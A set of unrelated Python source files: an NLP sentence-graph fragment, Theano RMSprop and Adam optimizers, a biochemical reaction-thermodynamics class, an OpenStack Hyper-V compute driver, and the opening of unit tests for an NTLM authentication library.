for entity in self.entities:
entityOffsets = Range.charOffsetToTuples(entity.get("charOffset"))
entityHeadOffset = Range.charOffsetToSingleTuple(entity.get("headOffset"))
for token in self.tokens:
tokenOffset = Range.charOffsetToSingleTuple(token.get("charOffset"))
for entityOffset in entityOffsets:
if Range.overlap(entityOffset, tokenOffset):
self.tokenIsEntity[token] = True
if entity.get("given") == "True":
self.tokenIsName[token] = True
# if entity.get("given") != None:
# if entity.get("given") == "True":
# self.tokenIsName[token] = True
# else:
# entity.set("given", "True")
# self.tokenIsName[token] = True
if Range.overlap(entityHeadOffset, tokenOffset):
self.tokenIsEntityHead[token].append(entity)
def getTokenText(self, token):
"""
Returns the text of a token, and masks it if the token is the head token
of a named entity.
@param token: interaction-XML syntactic token.
@type token: cElementTree.Element
"""
if self.tokenIsName[token]:
return "NAMED_ENT"
else:
return token.get("text")
def getCleared(self):
c = SentenceGraph(self.sentenceElement, self.tokens, self.dependencies)
namedEntities = []
for entity in self.entities:
if entity.get("given") == "True":
namedEntities.append(entity)
c.mapInteractions(namedEntities, [])
return c
def mergeInteractionGraph(self, merge=True):
"""
For merging duplicate entities
keepDuplicates - allows calling the function with no effect, so that the same code
can be used for merged and unmerged cases
"""
self.mergedEntities = []
self.mergedEntityToDuplicates = {}
#duplicates = {}
#mergedIds = {}
if not merge: # no entities are filtered
# Create dummy structures
for entity in self.entities:
mergedIds[entity] = entity.get("id")
self.mergedEntities.append(entity)
self.mergedEntityToDuplicates[entity] = []
return
# Mark all duplicates after the first one in the list for removal
removeEntities = [False] * len(self.entities)
entitiesToKeep = []
for i in range(len(self.entities)): # loop through all entities, including the last one
if removeEntities[i]: # entity has been already removed
continue
self.mergedEntities.append(self.entities[i])
#mergedIds[entities[i]] = entities[i].get("id")
self.mergedEntityToDuplicates[self.entities[i]] = []
if self.entities[i].get("given") == "True": # named entities are never merged
continue
for j in range(i+1, len(self.entities)): # loop through all entities coming after entity "i"
# Entities are duplicates if they have the same type and head token
# Also, they are not duplicates if the charOffset differs. This shoulnd't matter,
# as the head tokens are the same, but in practice, on the GE, task improves performance,
# maybe due to multiple similar examples affecting SVM learning.
if self.entities[i].get("type") == self.entities[j].get("type") and \
self.entities[i].get("charOffset") == self.entities[j].get("charOffset"): # and self.entityHeadTokenByEntity[self.entities[i]] == self.entityHeadTokenByEntity[self.entities[j]]:
removeEntities[j] = True
#mergedIds[entities[i]] += "/" + entities[j].get("id")
self.mergedEntityToDuplicates[self.entities[i]].append(self.entities[j])
#return entitiesToKeep, mergedIds, duplicates
| |
#LICENCE : for adam optimizer (Modified from https://gist.github.com/Newmu/acb738767acb4788bac3)
"""
The MIT License (MIT)
Copyright (c) 2015 Alec Radford
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import theano
import numpy as np
from theano import config
from collections import OrderedDict
import theano.tensor as T
"""
OPTIMIZERS FOR THEANO
"""
"""
UTILITY FUNCTIONS
"""
def regularize(cost, params, reg_val, reg_type, reg_spec):
"""
Return a theano cost
cost: cost to regularize
params: list of parameters
reg_val: multiplier for regularizer
reg_type: accepted types of regularizer 'l1','l2'
pnorm_str: simple regex to exclude parameters not satisfying regex
"""
l1 = lambda p: T.sum(abs(p))
l2 = lambda p: T.sum(p**2)
rFxn = {}
rFxn['l1']=l1
rFxn['l2']=l2
if reg_type=='l2' or reg_type=='l1':
assert reg_val is not None,'Expecting reg_val to be specified'
print "<< Reg:("+reg_type+') Reg. Val:('+str(reg_val)+') Reg. Spec.:('+reg_spec+')>>'
regularizer= theano.shared(np.asarray(0).astype(config.floatX),name = 'reg_norm', borrow=True)
for p in params:
if reg_spec in p.name:
regularizer += rFxn[reg_type](p)
print ('<<<<<< Adding '+reg_type+' regularization for '+p.name)+' >>>>>>'
return cost + reg_val*regularizer
else:
return cost
def normalize(grads, grad_norm):
"""
grads: list of gradients
grad_norm : None (or positive value)
returns: gradients rescaled to satisfy norm constraints
"""
#Check if we're clipping gradients
if grad_norm is not None:
assert grad_norm > 0, 'Must specify a positive value to normalize to'
print '<<<<<< Normalizing Gradients to have norm (',grad_norm,') >>>>>>'
g2 = 0.
for g in grads:
g2 += (g**2).sum()
new_grads = []
for g in grads:
new_grads.append(T.switch(g2 > (grad_norm**2), g/T.sqrt(g2)*grad_norm, g))
return new_grads
else:
return grads
def rescale(grads, divide_grad):
"""
grads : list of gradients
divide_grad : scalar or theano variable
returns: gradients divided by provided variable
"""
if divide_grad is not None:
print '<<<<<< Rescaling Gradients >>>>>>'
new_grads = []
for g in grads:
new_grads.append(g/divide_grad)
return new_grads
else:
return grads
"""
OPTIMIZERS
"""
def rmsprop(cost, params, lr=0.002, rho=0.9, epsilon = 1e-8, opt_params = None,
grad_range = None,
grad_norm = None,
reg_type = None,
reg_value= None,
reg_spec = 'DOESNOTMATCHANYTHING',
divide_grad = None
):
"""
RMSPROP Optimizer
cost (to be minimized)
params (list of parameters to take gradients with respect to)
.... parameters specific to the optimization ...
opt_params (if available, used to intialize the variables
returns: update list of tuples,
list of norms [0]: parameters [1]: gradients [2]: opt. params [3]: regularizer
opt_params: dictionary containing all the parameters for the optimization
"""
updates = []
regularized_cost = regularize(cost, params, reg_value, reg_type, reg_spec)
grads = T.grad(regularized_cost, params)
restartOpt = False
if opt_params is None:
restartOpt = True
opt_params=OrderedDict()
grads = rescale(grads, divide_grad)
grads = normalize(grads, grad_norm)
#No need to reload these
g_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'g_norm',borrow=True)
p_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'p_norm',borrow=True)
opt_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'opt_norm',borrow=True)
for p, g in zip(params,grads):
if grad_range is not None:
print '<<<<<< RMSPROP: Truncating Gradients in Range +-(',grad_range,') >>>>>>'
g = T.clip(g,-grad_range, grad_range)
if restartOpt:
f_prev = theano.shared(p.get_value()*0.,name = 'opt_fprev_'+p.name)
r_prev = theano.shared(p.get_value()*0.,name = 'opt_rprev_'+p.name)
opt_params['opt_rprev_'+p.name] = r_prev
opt_params['opt_fprev_'+p.name] = f_prev
else:
r_prev = opt_params['opt_rprev_'+p.name]
f_prev = opt_params['opt_fprev_'+p.name]
f_cur = rho*f_prev+(1-rho)*g
r_cur = rho*r_prev+(1-rho)*g**2
updates.append((r_prev,r_cur))
updates.append((f_prev,f_cur))
lr_t = lr/T.sqrt(r_cur+f_cur**2+epsilon)
p_t = p-(lr_t*g)
updates.append((p,p_t))
#Update norms
g_norm += (g**2).sum()
p_norm += (p**2).sum()
opt_norm+=(r_prev**2).sum()
return updates,[T.sqrt(p_norm), T.sqrt(g_norm), T.sqrt(opt_norm), regularized_cost], opt_params
def adam(cost, params, lr=0.001, b1=0.1, b2=0.001, e=1e-8, opt_params = None,
grad_range= None, #Whether or not you would like to specify a range for grads
grad_norm = None, #Clip gradients using normalization
reg_type = None,# Can be 'l1' or 'l2' or ''
reg_value = None, #Specify the multiplier for the regularization type
reg_spec = 'DOESNOTMATCHANYTHING',#Restricting the weights to consider set to '' to regularize all
divide_grad=None #Rescale the gradient by batch size
):
"""
ADAM Optimizer
cost (to be minimized)
params (list of parameters to take gradients with respect to)
.... parameters specific to the optimization ...
opt_params (if available, used to intialize the variables
"""
updates = []
regularized_cost = regularize(cost, params, reg_value, reg_type, reg_spec)
grads = T.grad(regularized_cost, params)
grads = rescale(grads, divide_grad)
grads = normalize(grads, grad_norm)
restartOpt = False
if opt_params is None:
restartOpt = True
opt_params=OrderedDict()
#Track the optimization variable
if restartOpt:
i = theano.shared(np.asarray(0).astype(config.floatX),name ='opt_i',borrow=True)
opt_params['opt_i'] = i
else:
i = opt_params['opt_i']
#No need to reload these theano variables
g_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'g_norm',borrow=True)
p_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'p_norm',borrow=True)
opt_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'opt_norm',borrow=True)
#Initialization for ADAM
i_t = i + 1.
fix1 = 1. - (1. - b1)**i_t
fix2 = 1. - (1. - b2)**i_t
lr_t = lr * (T.sqrt(fix2) / fix1)
for p, g in zip(params, grads):
if grad_range is not None:
print '<<<<<< ADAM: Truncating Gradients in Range +-(',grad_range,') >>>>>>'
g = T.clip(g,-grad_range, grad_range)
if restartOpt:
m = theano.shared(np.array(p.get_value() * 0.).astype(config.floatX),name = 'opt_m_'+p.name,borrow=True)
v = theano.shared(np.array(p.get_value() * 0.).astype(config.floatX),name = 'opt_v_'+p.name,borrow=True)
opt_params['opt_m_'+p.name] = m
opt_params['opt_v_'+p.name] = v
else:
m = opt_params['opt_m_'+p.name]
v = opt_params['opt_v_'+p.name]
m_t = (b1 * g) + ((1. - b1) * m)
v_t = (b2 * T.sqr(g)) + ((1. - b2) * v)
g_t = m_t / (T.sqrt(v_t) + e)
p_t = p - (lr_t * g_t)
updates.append((m, m_t))
updates.append((v, v_t))
updates.append((p, p_t))
#Update norms
g_norm += (g**2).sum()
p_norm += (p**2).sum()
opt_norm+=(m**2).sum() + (v**2).sum()
updates.append((i, i_t))
return updates, [T.sqrt(p_norm), T.sqrt(g_norm), T.sqrt(opt_norm), regularized_cost], opt_params
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 1 12:59:43 2017
@author: noore
"""
import json
import os
import re
import logging
from numpy import matrix, zeros, log, nan, inf
from equilibrator_api import settings
from equilibrator_api.compound import Compound
COMPOUND_JSON_FNAME = os.path.join(settings.DATA_DIR, 'cc_compounds.json')
class Reaction(object):
# load formation energies from the JSON file
COMPOUND_DICT = {}
for cd in json.load(open(COMPOUND_JSON_FNAME, 'r')):
kegg_id = cd.get('CID', 'unknown')
COMPOUND_DICT[kegg_id] = cd
REACTION_COUNTER = 0
def __init__(self, kegg_id_to_coeff, rid=None):
self.kegg_id_to_coeff = kegg_id_to_coeff
# Create the relevant "Compound" objects and store in a dictionary
self.kegg_id_to_compound = {}
for kegg_id in self.kegg_id_to_coeff.keys():
compound = Compound(Reaction.COMPOUND_DICT[kegg_id])
self.kegg_id_to_compound[kegg_id] = compound
if rid is not None:
self.reaction_id = rid
else:
self.reaction_id = 'R%05d' % Reaction.REACTION_COUNTER
Reaction.REACTION_COUNTER += 1
def kegg_ids(self):
return self.kegg_id_to_coeff.keys()
def is_empty(self):
return len(self.kegg_id_to_coeff) == 0
def get_coeff(self, kegg_id):
return self.kegg_id_to_coeff.get(kegg_id, 0)
def get_compound(self, kegg_id):
return self.kegg_id_to_compound.get(kegg_id, None)
def dG0_prime(self, pH=settings.DEFAULT_PH, pMg=settings.DEFAULT_PMG,
ionic_strength=settings.DEFAULT_IONIC_STRENGTH):
dG0_r_prime = 0
for kegg_id in self.kegg_ids():
coeff = self.get_coeff(kegg_id)
compound = self.get_compound(kegg_id)
dG0_r_prime += coeff * compound.dG0_prime(pH, pMg, ionic_strength)
return dG0_r_prime
def _GetSumCoeff(self):
"""
Calculate the sum of all coefficients (excluding water).
This is useful for shifting the dG'0 to another set of standard
concentrations (e.g. 1 mM)
"""
ids = set(self.kegg_ids()) - set(['C00001'])
sum_coeff = sum(map(self.get_coeff, ids))
return sum_coeff
def _GetAbsSumCoeff(self):
"""
Calculate the sum of all coefficients (excluding water) in
absolute value.
This is useful for calculating the reversibility index.
"""
ids = set(self.kegg_ids()) - set(['C00001'])
abs_sum_coeff = sum(map(abs, (map(self.get_coeff, ids))))
return abs_sum_coeff
def dGm_correction(self):
"""
Calculate the dG' in typical physiological concentrations (1 mM)
"""
return settings.RT * self._GetSumCoeff() * log(1e-3)
def dGm_prime(self):
"""
Calculate the dG' in typical physiological concentrations (1 mM)
"""
return self.dG0_prime() + self.dGm_correction()
def reversibility_index(self, pH=settings.DEFAULT_PH, pMg=settings.DEFAULT_PMG,
ionic_strength=settings.DEFAULT_IONIC_STRENGTH):
"""
Calculates the reversiblity index according to Noor et al. 2012:
https://doi.org/10.1093/bioinformatics/bts317
Returns:
ln_RI - the natural log of the RI
"""
dG0_prime = self.dG0_prime(pH, pMg, ionic_strength)
return self.calculate_reversibility_index_from_dG0_prime(dG0_prime)
def calculate_reversibility_index_from_dG0_prime(self, dG0_prime):
"""
Calculates the reversiblity index according to Noor et al. 2012:
https://doi.org/10.1093/bioinformatics/bts317
Returns:
ln_RI - the natural log of the RI
"""
sum_coeff = self._GetSumCoeff()
abs_sum_coeff = self._GetAbsSumCoeff()
if abs_sum_coeff == 0:
return inf
dGm_prime = dG0_prime + settings.RT * sum_coeff * log(1e-3)
ln_RI = (2.0 / abs_sum_coeff) * dGm_prime / settings.RT
return ln_RI
@staticmethod
def parse_formula_side(s):
"""
Parses the side formula, e.g. '2 C00001 + C00002 + 3 C00003'
Ignores stoichiometry.
Returns:
The set of CIDs.
"""
if s.strip() == "null":
return {}
compound_bag = {}
for member in re.split('\s+\+\s+', s):
tokens = member.split(None, 1) # check for stoichiometric coeff
if len(tokens) == 0:
continue
if len(tokens) == 1:
amount = 1
key = member
else:
try:
amount = float(tokens[0])
except ValueError:
raise ValueError('could not parse the reaction side: %s'
% s)
key = tokens[1]
compound_bag[key] = compound_bag.get(key, 0) + amount
return compound_bag
@staticmethod
def parse_formula(formula, name_to_cid=None, rid=None):
"""
Parses a two-sided formula such as: 2 C00001 = C00002 + C00003
Args:
formula - a string representation of the chemical formula
name_to_cid - (optional) a dictionary mapping names to KEGG IDs
Return:
The set of substrates, products and the reaction direction
"""
tokens = []
for arrow in settings.POSSIBLE_REACTION_ARROWS:
if formula.find(arrow) != -1:
tokens = formula.split(arrow, 2)
break
if len(tokens) < 2:
raise ValueError('Reaction does not contain an allowed arrow sign:'
' %s' % (arrow, formula))
left = tokens[0].strip()
right = tokens[1].strip()
sparse_reaction = {}
for cid, count in Reaction.parse_formula_side(left).items():
sparse_reaction[cid] = sparse_reaction.get(cid, 0) - count
for cid, count in Reaction.parse_formula_side(right).items():
sparse_reaction[cid] = sparse_reaction.get(cid, 0) + count
# remove compounds that are balanced out in the reaction,
# i.e. their coefficient is 0
sparse_reaction = dict(filter(lambda x: x[1] != 0,
sparse_reaction.items()))
if name_to_cid is not None:
# replace the names of the metabolites with their KEGG IDs
# using this dictionary
sparse_reaction = \
dict(zip(map(name_to_cid.get, sparse_reaction.keys()),
sparse_reaction.values()))
if 'C00080' in sparse_reaction:
sparse_reaction.pop('C00080')
return Reaction(sparse_reaction, rid=rid)
@staticmethod
def write_compound_and_coeff(compound_id, coeff):
if coeff == 1:
return compound_id
else:
return "%g %s" % (coeff, compound_id)
def write_formula(self):
"""String representation."""
left = []
right = []
for kegg_id in self.kegg_ids():
coeff = self.get_coeff(kegg_id)
if coeff < 0:
left.append(Reaction.write_compound_and_coeff(kegg_id, -coeff))
elif coeff > 0:
right.append(Reaction.write_compound_and_coeff(kegg_id, coeff))
return "%s %s %s" % (' + '.join(left), '=', ' + '.join(right))
def _get_element_matrix(self):
# gather the "atom bags" of all compounds in a list 'atom_bag_list'
elements = set()
atom_bag_list = []
for kegg_id in self.kegg_ids():
comp = self.get_compound(kegg_id)
atom_bag = comp.get_atom_bag()
if atom_bag is not None:
elements = elements.union(atom_bag.keys())
atom_bag_list.append(atom_bag)
elements = sorted(elements)
# create the elemental matrix, where each row is a compound and each
# column is an element (or e-)
Ematrix = matrix(zeros((len(atom_bag_list), len(elements))))
for i, atom_bag in enumerate(atom_bag_list):
if atom_bag is None:
Ematrix[i, :] = nan
else:
for j, elem in enumerate(elements):
Ematrix[i, j] = atom_bag.get(elem, 0)
return elements, Ematrix
def _get_reaction_atom_balance(self):
cids = list(self.kegg_ids())
coeffs = matrix(list(map(self.get_coeff, cids)))
elements, Ematrix = self._get_element_matrix()
conserved = coeffs * Ematrix
conserved = conserved.round(3)
atom_balance_dict = dict([(e, c) for (e, c) in
zip(elements, conserved.flat) if (c != 0)])
return atom_balance_dict
def check_half_reaction_balancing(self):
"""
Returns:
The number of electrons that are 'missing' in the half-reaction
or None if the reaction is not atomwise-balanced.
"""
atom_balance_dict = self._get_reaction_atom_balance()
n_e = atom_balance_dict.pop('e-', 0)
if not self._check_balancing(atom_balance_dict):
return None
else:
return n_e
def check_full_reaction_balancing(self):
"""
Returns:
True iff the reaction is balanced for all elements
(excluding H)
"""
atom_balance_dict = self._get_reaction_atom_balance()
return self._check_balancing(atom_balance_dict)
def _check_balancing(self, atom_balance_dict):
"""
Use for checking if all elements are conserved.
Returns:
An atom_bag of the differences between the sides of the
reaction. E.g. if there is one extra C on the left-hand
side, the result will be {'C': -1}.
"""
if nan in atom_balance_dict.values():
warning_str = 'cannot test reaction balancing because of ' + \
'unspecific compound formulas: %s' % \
self.write_formula()
raise ValueError(warning_str)
# if there are unbalanced elements, write a full report
if len(atom_balance_dict) == 0:
return True
logging.warning('unbalanced reaction: %s' % self.write_formula())
for elem, c in atom_balance_dict.items():
if c != 0:
logging.warning('there are %d more %s atoms on the '
'right-hand side' % (c, elem))
return False
| |
# Copyright (c) 2010 Cloud.com, Inc
# Copyright (c) 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A Hyper-V Nova Compute driver.
"""
import platform
from nova.i18n import _
from nova.openstack.common import log as logging
from nova.virt import driver
from nova.virt.hyperv import hostops
from nova.virt.hyperv import livemigrationops
from nova.virt.hyperv import migrationops
from nova.virt.hyperv import rdpconsoleops
from nova.virt.hyperv import snapshotops
from nova.virt.hyperv import vmops
from nova.virt.hyperv import volumeops
LOG = logging.getLogger(__name__)
class HyperVDriver(driver.ComputeDriver):
def __init__(self, virtapi):
super(HyperVDriver, self).__init__(virtapi)
self._hostops = hostops.HostOps()
self._volumeops = volumeops.VolumeOps()
self._vmops = vmops.VMOps()
self._snapshotops = snapshotops.SnapshotOps()
self._livemigrationops = livemigrationops.LiveMigrationOps()
self._migrationops = migrationops.MigrationOps()
self._rdpconsoleops = rdpconsoleops.RDPConsoleOps()
def init_host(self, host):
self._vmops.restart_vm_log_writers()
def list_instance_uuids(self):
return self._vmops.list_instance_uuids()
def list_instances(self):
return self._vmops.list_instances()
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None,
flavor=None):
self._vmops.spawn(context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None, bad_volumes_callback=None):
self._vmops.reboot(instance, network_info, reboot_type)
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None):
self._vmops.destroy(instance, network_info, block_device_info,
destroy_disks)
def cleanup(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None, destroy_vifs=True):
"""Cleanup after instance being destroyed by Hypervisor."""
pass
def get_info(self, instance):
return self._vmops.get_info(instance)
def attach_volume(self, context, connection_info, instance, mountpoint,
disk_bus=None, device_type=None, encryption=None):
return self._volumeops.attach_volume(connection_info,
instance['name'])
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
return self._volumeops.detach_volume(connection_info,
instance['name'])
def get_volume_connector(self, instance):
return self._volumeops.get_volume_connector(instance)
def get_available_resource(self, nodename):
return self._hostops.get_available_resource()
def get_available_nodes(self, refresh=False):
return [platform.node()]
def host_power_action(self, action):
return self._hostops.host_power_action(action)
def snapshot(self, context, instance, image_id, update_task_state):
self._snapshotops.snapshot(context, instance, image_id,
update_task_state)
def pause(self, instance):
self._vmops.pause(instance)
def unpause(self, instance):
self._vmops.unpause(instance)
def suspend(self, context, instance):
self._vmops.suspend(instance)
def resume(self, context, instance, network_info, block_device_info=None):
self._vmops.resume(instance)
def power_off(self, instance, timeout=0, retry_interval=0):
self._vmops.power_off(instance, timeout, retry_interval)
def power_on(self, context, instance, network_info,
block_device_info=None):
self._vmops.power_on(instance, block_device_info)
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""Resume guest state when a host is booted."""
self._vmops.resume_state_on_host_boot(context, instance, network_info,
block_device_info)
def live_migration(self, context, instance, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
self._livemigrationops.live_migration(context, instance, dest,
post_method, recover_method,
block_migration, migrate_data)
def rollback_live_migration_at_destination(self, context, instance,
network_info,
block_device_info,
destroy_disks=True,
migrate_data=None):
self.destroy(context, instance, network_info, block_device_info)
def pre_live_migration(self, context, instance, block_device_info,
network_info, disk_info, migrate_data=None):
self._livemigrationops.pre_live_migration(context, instance,
block_device_info,
network_info)
def post_live_migration(self, context, instance, block_device_info,
migrate_data=None):
self._livemigrationops.post_live_migration(context, instance,
block_device_info)
def post_live_migration_at_destination(self, context, instance,
network_info,
block_migration=False,
block_device_info=None):
self._livemigrationops.post_live_migration_at_destination(
context,
instance,
network_info,
block_migration)
def check_can_live_migrate_destination(self, context, instance,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
return self._livemigrationops.check_can_live_migrate_destination(
context, instance, src_compute_info, dst_compute_info,
block_migration, disk_over_commit)
def check_can_live_migrate_destination_cleanup(self, context,
dest_check_data):
self._livemigrationops.check_can_live_migrate_destination_cleanup(
context, dest_check_data)
def check_can_live_migrate_source(self, context, instance,
dest_check_data, block_device_info=None):
return self._livemigrationops.check_can_live_migrate_source(
context, instance, dest_check_data)
def get_instance_disk_info(self, instance, block_device_info=None):
pass
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
msg = _("VIF plugging is not supported by the Hyper-V driver.")
raise NotImplementedError(msg)
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
msg = _("VIF unplugging is not supported by the Hyper-V driver.")
raise NotImplementedError(msg)
def ensure_filtering_rules_for_instance(self, instance, network_info):
LOG.debug("ensure_filtering_rules_for_instance called",
instance=instance)
def unfilter_instance(self, instance, network_info):
LOG.debug("unfilter_instance called", instance=instance)
def migrate_disk_and_power_off(self, context, instance, dest,
flavor, network_info,
block_device_info=None,
timeout=0, retry_interval=0):
return self._migrationops.migrate_disk_and_power_off(context,
instance, dest,
flavor,
network_info,
block_device_info,
timeout,
retry_interval)
def confirm_migration(self, migration, instance, network_info):
self._migrationops.confirm_migration(migration, instance, network_info)
def finish_revert_migration(self, context, instance, network_info,
block_device_info=None, power_on=True):
self._migrationops.finish_revert_migration(context, instance,
network_info,
block_device_info, power_on)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
self._migrationops.finish_migration(context, migration, instance,
disk_info, network_info,
image_meta, resize_instance,
block_device_info, power_on)
def get_host_ip_addr(self):
return self._hostops.get_host_ip_addr()
def get_host_uptime(self):
return self._hostops.get_host_uptime()
def get_rdp_console(self, context, instance):
return self._rdpconsoleops.get_rdp_console(instance)
def get_console_output(self, context, instance):
return self._vmops.get_console_output(instance)
| |
import base64
import hashlib
import os
import requests
import sys
import warnings
import pytest
from requests.auth import AuthBase
from ntlm_auth.constants import NegotiateFlags
from ntlm_auth.exceptions import NoAuthContextError
from ntlm_auth.gss_channel_bindings import GssChannelBindingsStruct
from ntlm_auth.ntlm import Ntlm, NtlmContext
from ntlm_auth.session_security import SessionSecurity
default_negotiate_flags = NegotiateFlags.NTLMSSP_NEGOTIATE_TARGET_INFO | \
NegotiateFlags.NTLMSSP_NEGOTIATE_128 | \
NegotiateFlags.NTLMSSP_NEGOTIATE_56 | \
NegotiateFlags.NTLMSSP_NEGOTIATE_UNICODE | \
NegotiateFlags.NTLMSSP_NEGOTIATE_VERSION | \
NegotiateFlags.NTLMSSP_NEGOTIATE_KEY_EXCH | \
NegotiateFlags.NTLMSSP_NEGOTIATE_ALWAYS_SIGN | \
NegotiateFlags.NTLMSSP_NEGOTIATE_SIGN | \
NegotiateFlags.NTLMSSP_NEGOTIATE_SEAL
class TestInitialiseNtlm(object):
def test_initialise_defaults(self):
ntlm_context = Ntlm()
expected_flags = \
default_negotiate_flags | \
NegotiateFlags.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
expected_ntlm_compatibility = 3
actual_flags = ntlm_context.negotiate_flags
actual_ntlm_compatibility = ntlm_context.ntlm_compatibility
assert actual_flags == expected_flags
assert actual_ntlm_compatibility == expected_ntlm_compatibility
def test_initialise_with_ntlm0(self):
ntlm_context = Ntlm(ntlm_compatibility=0)
expected_flags = default_negotiate_flags | \
NegotiateFlags.NTLMSSP_NEGOTIATE_NTLM | \
NegotiateFlags.NTLMSSP_NEGOTIATE_LM_KEY
expected_ntlm_compatibility = 0
actual_flags = ntlm_context.negotiate_flags
actual_ntlm_compatibility = ntlm_context.ntlm_compatibility
assert actual_flags == expected_flags
assert actual_ntlm_compatibility == expected_ntlm_compatibility
def test_initialise_with_ntlm1(self):
ntlm_context = Ntlm(ntlm_compatibility=1)
expected_flags = \
default_negotiate_flags | NegotiateFlags.NTLMSSP_NEGOTIATE_NTLM | \
NegotiateFlags.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
expected_ntlm_compatibility = 1
actual_flags = ntlm_context.negotiate_flags
actual_ntlm_compatibility = ntlm_context.ntlm_compatibility
assert actual_flags == expected_flags
assert actual_ntlm_compatibility == expected_ntlm_compatibility
def test_initialise_with_ntlm2(self):
ntlm_context = Ntlm(ntlm_compatibility=2)
expected_flags = \
default_negotiate_flags |\
NegotiateFlags.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
expected_ntlm_compatibility = 2
actual_flags = ntlm_context.negotiate_flags
actual_ntlm_compatibility = ntlm_context.ntlm_compatibility
assert actual_flags == expected_flags
assert actual_ntlm_compatibility == expected_ntlm_compatibility
def test_initialise_with_ntlm3(self):
ntlm_context = Ntlm(ntlm_compatibility=3)
expected_flags = \
default_negotiate_flags |\
NegotiateFlags.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
expected_ntlm_compatibility = 3
actual_flags = ntlm_context.negotiate_flags
actual_ntlm_compatibility = ntlm_context.ntlm_compatibility
assert actual_flags == expected_flags
assert actual_ntlm_compatibility == expected_ntlm_compatibility
def test_initialise_with_ntlm4(self):
ntlm_context = Ntlm(ntlm_compatibility=4)
expected_flags = \
default_negotiate_flags |\
NegotiateFlags.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
expected_ntlm_compatibility = 4
actual_flags = ntlm_context.negotiate_flags
actual_ntlm_compatibility = ntlm_context.ntlm_compatibility
assert actual_flags == expected_flags
assert actual_ntlm_compatibility == expected_ntlm_compatibility
def test_initialise_with_ntlm5(self):
ntlm_context = Ntlm(ntlm_compatibility=5)
expected_flags = \
default_negotiate_flags |\
NegotiateFlags.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
expected_ntlm_compatibility = 5
actual_flags = ntlm_context.negotiate_flags
actual_ntlm_compatibility = ntlm_context.ntlm_compatibility
assert actual_flags == expected_flags
assert actual_ntlm_compatibility == expected_ntlm_compatibility
def test_initialise_with_illegal_ntlm_compatibility_high(self):
with pytest.raises(Exception) as exc:
Ntlm(ntlm_compatibility=6)
assert str(exc.value) == "Unknown ntlm_compatibility level - " \
"expecting value between 0 and 5"
def test_initialise_with_illegal_ntlm_compatibility_low(self):
with pytest.raises(Exception) as exc:
Ntlm(ntlm_compatibility=-1)
assert str(exc.value) == "Unknown ntlm_compatibility level - " \
"expecting value between 0 and 5"
class TestMessages(object):
# Contains only lightweight tests, the actual message tests and its
# permutations are in test_message.py
def test_create_negotiate_message(self):
ntlm_context = Ntlm()
expected = b'TlRMTVNTUAABAAAAMbCI4gYABgAoAAAACAAIAC4AAAAGAbEdAAAAD0RvbWFpbkNPTVBVVEVS'
actual = ntlm_context.create_negotiate_message("Domain", "COMPUTER")
assert actual == expected
def test_create_authenticate_message(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
monkeypatch.setattr('ntlm_auth.messages.get_version',
lambda s: b"\x05\x01\x28\x0A\x00\x00\x00\x0F")
monkeypatch.setattr('ntlm_auth.messages.get_random_export_session_key',
lambda: b"\x55" * 16)
monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp',
lambda: b"\x00" * 8)
test_challenge_string = base64.b64encode(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x2f\x82\x88\xe2"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
